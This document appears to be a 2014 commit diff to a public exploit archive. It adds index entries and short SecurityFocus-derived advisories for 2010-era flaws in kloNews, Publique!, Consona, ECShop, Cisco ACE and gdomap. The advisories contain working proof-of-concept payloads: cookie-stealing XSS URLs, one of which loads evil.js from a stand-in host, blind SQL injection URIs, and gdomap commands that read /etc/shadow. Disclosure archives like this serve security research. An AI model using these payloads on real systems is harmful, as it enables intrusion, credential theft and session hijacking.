Updated 07_05_2014

files.csv

@@ -30579,3 +30579,9 @@ id,file,description,date,author,platform,type,port
 33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)",2014-07-02,LiquidWorm,windows,dos,0
 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent XSS Vulnerability",2014-07-02,Provensec,php,webapps,80
 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
+33957,platforms/php/webapps/33957.txt,"kloNews 2.0 'cat.php' Cross Site Scripting Vulnerability",2010-01-20,"cr4wl3r ",php,webapps,0
+33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
+33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
+33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 'category.php' SQL Injection Vulnerability",2010-05-07,Liscker,php,webapps,0
+33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0
+33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0

platforms/asp/webapps/33959.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/39999/info
+
+Multiple Consona (formerly SupportSoft) products are prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials; other attacks are possible.
+
+The following are vulnerable:
+Consona Live Assistance
+Consona Dynamic Agent
+Consona Subscriber Assistance 
+
+http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=";}</script><script src="http://www.example.org/pluginlicense.js" type="text/javascript"></script><script>RenderLicense();</script><script>function returnback(){ var cnfctl = new ActiveXObject("SdcUser.TgConfCtl"); cnfctl.WHATEVER();}</script><!--
+http://www.example.com/sdccommon/verify/asp/n6plugindestructor.asp?backurl=</script><script src=http://www.example.org/evil.js></script><script>function returnback() {document.write(license);document.write(payload);}</script>

platforms/cgi/webapps/33958.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39988/info
+
+Publique! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Publique! 2.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/publique/cgi/cgilua.exe/sys/start.htm?sid=1 

platforms/hardware/remote/33962.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/40002/info
+
+Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.
+
+Attackers can exploit this issue to avoid having client IP addresses logged by servers. 
+
+GET / HTTP / 1 . 1
+HOST: Myserver.com
+CONNECTION: KEEP-ALIVE
+
+GET / HTTP/1.1
+HOST: Myserver.com
+CONNECTION: KEEP-ALIVE 

platforms/linux/local/33963.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/40005/info
+
+gdomap is prone to multiple local information-disclosure vulnerabilities.
+
+Local attackers can exploit these issues to obtain sensitive information that may lead to further attacks. 
+
+The following example commands are available:
+
+$ gdomap -c /etc/shadow
+$ gdomap -a /etc/shadow 

platforms/php/webapps/33953.txt

@@ -20,13 +20,4 @@ sensitive information retained by your browser and used with that site.
 # 4. Select column Employees and as a value use: "><script>alert('XSS by
 Provensec')</script>
 # 5. Save the report and share it with other users to distribute your
-malicious code.
-
-Screenshot attached
-
-JSacco
-CTO - Provensec.com
-
-"Think as a hacker, be professional"
-URL: http://provensec.com
-Mobile: +31 6 8209 2565
+malicious code.

platforms/php/webapps/33957.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/39987/info
+
+kloNews is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+kloNews 2.0 is vulnerable; other versions may also be affected.
+
+http://wwww.example.com/cat.php?cat=<script>alert(document.cookie);</script>

platforms/php/webapps/33960.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/40001/info
+
+ECShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ECShop 2.7.2 is vulnerable; other versions may also be affected. 
+
+The following example URIs are available:
+
+http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2
+
+http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2